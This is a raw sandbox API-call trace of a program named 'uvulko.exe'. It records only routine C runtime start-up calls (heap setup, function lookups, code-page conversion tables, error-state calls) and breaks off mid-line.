# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 06.01.2020 02:29:41.834 Process: id = "1" image_name = "uvulko.exe" filename = "c:\\users\\fd1hvy\\desktop\\uvulko.exe" page_root = "0x2b62000" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\uvulko.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xf44 [0036.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x3c5c30cc, dwHighDateTime=0x1d5c439)) [0036.396] GetCurrentProcessId () returned 0xf54 [0036.396] GetCurrentThreadId () returned 0xf44 [0036.396] GetTickCount () returned 0x1149aca [0036.396] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff60 | out: lpPerformanceCount=0x19ff60*=12787517091) returned 1 [0036.680] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0036.680] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0xea0000 [0036.680] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.681] GetProcAddress (hModule=0x75e90000, lpProcName="FlsAlloc") returned 0x75ea4ae0 [0036.681] GetProcAddress (hModule=0x75e90000, lpProcName="FlsGetValue") returned 0x75ea4b20 [0036.681] GetProcAddress (hModule=0x75e90000, lpProcName="FlsSetValue") returned 0x75ea4b40 [0036.681] GetProcAddress (hModule=0x75e90000, lpProcName="FlsFree") returned 0x75ea4b00 [0036.681] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.681] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.681] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.681] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.682] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.682] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.682] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.682] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.682] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.682] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.683] GetProcAddress (hModule=0x75e90000, lpProcName="DecodePointer") returned 0x77c11ec0 [0036.683] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x238) returned 0xea05a8 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.683] GetProcAddress (hModule=0x75e90000, lpProcName="DecodePointer") returned 0x77c11ec0 [0036.683] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.683] GetProcAddress (hModule=0x75e90000, lpProcName="EncodePointer") returned 0x77c129e0 [0036.683] GetProcAddress (hModule=0x75e90000, lpProcName="DecodePointer") returned 0x77c11ec0 [0036.683] GetCurrentThreadId () returned 0xf44 [0036.683] GetStartupInfoA (in: lpStartupInfo=0x19fe84 | out: lpStartupInfo=0x19fe84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0036.684] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x824) returned 0xea07e8 [0036.684] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.684] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.684] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.684] SetHandleCount (uNumber=0x20) returned 0x20 [0036.684] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\uvulko.exe\" " [0036.684] GetEnvironmentStringsW () returned 0xbf0cf8* [0036.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0036.684] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x589) returned 0xea1018 [0036.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0xea1038, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0036.684] FreeEnvironmentStringsW (penv=0xbf0cf8) returned 1 [0036.684] GetLastError () returned 0x0 [0036.684] SetLastError (dwErrCode=0x0) [0036.684] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetACP () returned 0x4e4 [0036.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x244) returned 0xea15b0 [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.685] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe4c | out: lpCPInfo=0x19fe4c) returned 1 [0036.685] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f910 | out: lpCPInfo=0x19f910) returned 1 [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8a8 | out: lpCharType=0x19f8a8) returned 1 [0036.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.685] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x22c) returned 0xea1800 [0036.685] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0xea1828, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0036.685] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x19fc30 | out: lpCharType=0x19fc30) returned 1 [0036.685] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1800) returned 1 [0036.685] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1800 | out: hHeap=0xea0000) returned 1 [0036.685] GetLastError () returned 0x0 [0036.685] SetLastError (dwErrCode=0x0) [0036.685] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x22c) returned 0xea1800 [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0xea1828, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x22c) returned 0xea1a38 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0xea1a60, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0036.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fb30, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0036.686] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1a38) returned 1 [0036.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1a38 | out: hHeap=0xea0000) returned 1 [0036.686] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1800) returned 1 [0036.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1800 | out: hHeap=0xea0000) returned 1 [0036.686] GetLastError () returned 0x0 [0036.686] SetLastError (dwErrCode=0x0) [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x22c) returned 0xea1800 [0036.686] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f928, cbMultiByte=256, lpWideCharStr=0xea1828, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.686] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x22c) returned 0xea1a38 [0036.686] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0xea1a60, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0036.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fa30, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0036.686] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1a38) returned 1 [0036.686] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1a38 | out: hHeap=0xea0000) returned 1 [0036.687] HeapValidate (hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1800) returned 1 [0036.687] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xea1800 | out: hHeap=0xea0000) returned 1 [0036.687] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x435830, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\uvulko.exe")) returned 0x22 [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.687] SetLastError (dwErrCode=0x0) [0036.687] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 0x0 [0036.688] SetLastError (dwErrCode=0x0) [0036.688] GetLastError () returned 